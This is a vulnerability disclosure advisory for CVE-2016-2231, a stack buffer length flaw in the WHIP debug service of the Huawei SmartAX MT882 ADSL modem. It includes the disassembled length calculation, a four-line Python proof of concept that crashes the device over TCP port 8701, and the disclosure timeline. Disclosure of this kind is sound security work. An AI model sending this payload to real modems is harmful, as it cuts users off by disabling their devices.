Security Advisory: WHIP Vulnerability

 

  • Topic: Denial of Service (DoS) vulnerability in Huawei SmartAX MT882 ADSL Modem.
  • Class: Remote DoS.
  • Severity: Medium.
  • Date published: 2016-02-11
  • Date of last update: 2016-02-11
  • CVE number: CVE-2016-2231
  • Credits: Déborah Valeria Higa
  • Affects:
    • Product name: Huawei SmartAX MT882 ADSL Modem.
    • Affected version: V200R002B022 Arg

 

I. Background

Huawei SmartAX MT882 includes a Windows-based Host Interface Program (WHIP) service at TCP port 8701 which is used to test and debug the device.

 

II. Problem Description

The implementation of WHIP protocol has a security hole in it’s parser:

  1. Allocates a buffer of 0x800 length in stack.
  2. Receives a first packet of 4 bytes and stores it in the buffer.
  3. Receives a second packet of N bytes and stores it in the buffer.

The N bytes are determined by the first byte of the first packet.
Assuming that this byte is stored in %o2 (SPARC Architecture), this is how it calculates “N”:

sll %o2, 24, %o2
sra %o2, 24, %o2
inc %o2
sll %o2, 16, %o2
srl %o2, 16, %o2

So, if %o2 has an initial value of 0xFE, the second packet can be a length of 0xFFFF, higher than what the buffer can contain.
The vulnerability can also be a Buffer Overflow and the severity would be higher, but it is not yet probed.

 

III. Impact

A remote attacker may be able to exploit the problem sending the described two packets to port 8701 and cause a DoS attack, suspending the operation of the device.

 

IV. Supporting Technical Details

– System configuration:

Even when the service is disabled (default condition), it’s port is opened and parses the packet so it is still exploitable.
This was checked in the Command Line Interface (CLI) through the UART port.

Users cannot configure any service through the modem’s website.

– Proof of concept:

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.0.0.2', 8701))
s.send('\xFE'+'\x00'*0x3000)
s.close()

 

V. Report Timeline

  • 2015-10-31: contact Huawei Product Security Incident Response Team (PSIRT) to inform them that two vulnerabilities has been found in Huawei SmartAX MT882 ADSL Modem. Send a draft advisory with technical details and PoCs files.
  • 2015-11-01: Huawei PSIRT acknowledges reception of the advisory.
  • 2015-11-11: Huawei PSIRT confirms FTP vulnerability and asks both PoCs and more information about WHIP service.
  • 2015-11-13: send requested information.
  • 2015-11-16: Huawei PSIRT acknowledges.
  • 2015-11-25: Huawei PSIRT informs that the warranty for the MT882 has expired, but confirm that the replacement product MT882a does not have the two vulnerabilities.
  • 2015-11-25: inform that MT882 product is still distributed by Argentina’s ISP Arnet.
  • 2015-11-27: Huawei PSIRT acknowledges.
  • 2016-01-15: request a status update.
  • 2016-01-15: Huawei PSIRT informs that they have contacted Argentina’s front line which have notified to Arnet, but customer didn’t give the result. Argentina’s front line will ask customer again next week.
  • 2016-01-22: Huawei PSIRT informs that Arnet uses HG532s as replacement.
  • 2016-01-23: contact to inform that the investigation is considered closed and asks for confirmation.
  • 2016-01-25: Huawei PSIRT acknowledges.
  • 2016-02-11: Security Advisory published.